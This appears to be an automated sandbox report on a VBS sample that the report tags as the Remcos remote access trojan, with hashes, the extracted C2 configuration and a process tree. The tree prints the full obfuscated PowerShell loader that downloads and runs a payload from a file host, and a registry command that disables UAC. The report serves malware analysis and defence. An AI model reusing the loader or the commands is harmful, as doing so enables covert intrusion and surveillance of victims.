Overview

overview

10

Static

static

1

9fc46e1dec...1f.vbs

windows7-x64

10

9fc46e1dec...1f.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2024 02:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9fc46e1dec1ebaa57e09e3a3d12cfc8b95653d6f26a754a0596d10b0ba9b3f1f.vbs

  • Size

    33KB

  • MD5

    25a7df33e8fee89dfef3426080405533

  • SHA1

    3bb1b11f8b041a59a4e8c498c88bbeae17d5f182

  • SHA256

    9fc46e1dec1ebaa57e09e3a3d12cfc8b95653d6f26a754a0596d10b0ba9b3f1f

  • SHA512

    71fc9d9b64dce6f66941e63567c5eb89f57fb1e9caefbdb9fcd2eb1bb2bde1a98a4b156196b91f47834561a3178bb22665b513edb6b440bf313a39ae63f87b50

  • SSDEEP

    768:AxuasGxaSoM5LC3gWamt6iNi+ehBhZ+2JZ/q367gTeVVh0krL3uS:SuasQo2GZU+ehB/+WIQEmf0k3J

Score
10/10
remcosremotehostdiscoveryevasionrattrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

45hq459.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-ZP0CQ6

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 64 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fc46e1dec1ebaa57e09e3a3d12cfc8b95653d6f26a754a0596d10b0ba9b3f1f.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2216
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2984
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1808
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1292

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    0f3e6e8051810e2681b97911a59c6107

    SHA1

    915808acb0a9fa19e559899b1b95cd0c05b193e7

    SHA256

    49f1f55a997da81998f7ffb667929a93ad35516f6db511a9e38e45b5ed5099ec

    SHA512

    ad9c8b102106068ff45d96ca868d0a34cc6614d0f2f60fd649c98274bd66c9539ac4ce151e34675446502149a6481a389e55c40227b4f393a12cc2bca370b02c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    b22fbe15d39a8a922860b0656f7f47ee

    SHA1

    bcf6a9c1744ce274a2203afdeb7a4abfc38d6cb1

    SHA256

    eb8f3d4e4320e15feb9387af0e3f864c7f8e970a0c40607071a42ea89314ae84

    SHA512

    bf0d0100241667d10598dd1288a3643687d038f88fada49e256106db782029de15323226ff0300150aa1907dd4f5135789e2a73856a11803cfe05ff729aeda4b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabF8B3.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar7BD5.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZJC8RVQX9G20UU4IVT23.temp
    Filesize

    7KB

    MD5

    6bb499126e6b371aa80ee3c9195f389d

    SHA1

    e67830c4d78a4fbd41bf5d4d2df148f7a17bb9e2

    SHA256

    efe40b6a443cc45658f85745aa4bcafbb4319060b4f2a98c4586a3f13147cb80

    SHA512

    5cf2cd67df326998fea9ac05d725a2c879bbe2572725739bd4e33ee28c7dc6d3f9cb97d6cd31f18c2ccae75cac9f38f061317bffe07977c50a72bbc0db0c9863

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Skyggeboksningerne.Cha
    Filesize

    423KB

    MD5

    c1c6567f2739c2f038cdcb65ebee8a05

    SHA1

    e533d6a51fef763b4765cfc842d6f99e3937176a

    SHA256

    e4e15d42053d9d51a43c89b75aea7bd42a809d0a99535947219c208ff985b0eb

    SHA512

    175c6f4f3c60112c33c5fbeb5705291551edf6a39cab33bb0e48742de1bdb97ecdd2a8a25a39a4dfa4acc402d742a51c278961d966b489388c16480d7f3ebb88

    Download Submit

  • memory/1808-60-0x0000000000BA0000-0x0000000001C02000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2456-36-0x00000000064B0000-0x00000000075E9000-memory.dmp

    Filesize

    17.2MB

    Download

  • memory/2984-23-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-29-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2984-30-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-32-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-27-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-26-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-25-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-24-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-22-0x00000000026E0000-0x00000000026E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2984-21-0x000000001B690000-0x000000001B972000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2984-20-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

    Filesize

    4KB

    Download